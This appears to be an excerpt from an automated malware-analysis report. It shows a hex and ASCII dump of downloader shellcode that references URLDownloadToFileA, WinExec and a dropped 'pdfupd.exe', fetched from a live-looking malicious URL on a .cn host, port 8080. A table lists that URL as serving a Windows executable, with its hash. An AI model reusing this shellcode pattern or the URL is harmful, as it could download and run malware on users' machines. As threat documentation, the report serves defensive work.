68 70 3f 69 64 3d 38 00 00 90 | PSQRVWU......]..
.1.d.@0x..@..p..
.@....@4.@|.@<VW
.^......N.......
..._^....^...Rh.
.....N.......^..
.1.....5c......t
...2F....2.....E
...R..R.......P.
..RP..V...j.j...
..^...R....x...R
j...j.....^...R.
.Z.......^...Rh.
.....N.......^..
.1.....5n......t
...2F....2.....E
...R..R.......P.
..RP..V...j.j...
..^...R........R
j...j.....^...R.
.Z....]_^ZY[X...
..............Ge
tTempPathA.LoadL
ibraryA.GetProcA
ddress.WinExec..
....0..u.)...1..
<.........f.....
...px...........
................
...P.........^1.
.V..........Q...
Yt.^C..^.....'..
.1..f...........
................
................
.VW.X..._^....>.
t....URLMON.DLL.
URLDownloadToFil
eA.pdfupd.exe.cr
ash.php.http://g
iantbeaversdiet.
cn:8080/landig.p
hp?id=8... |
Additional (potential) malware:
| URL | Type | Hash | Analysis |
|---|
| http://giantbeaversdiet.cn:8080/landig.php?id=8 |
MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit |
c5cfae0fd608a1898b5c36366eb1bccc |
|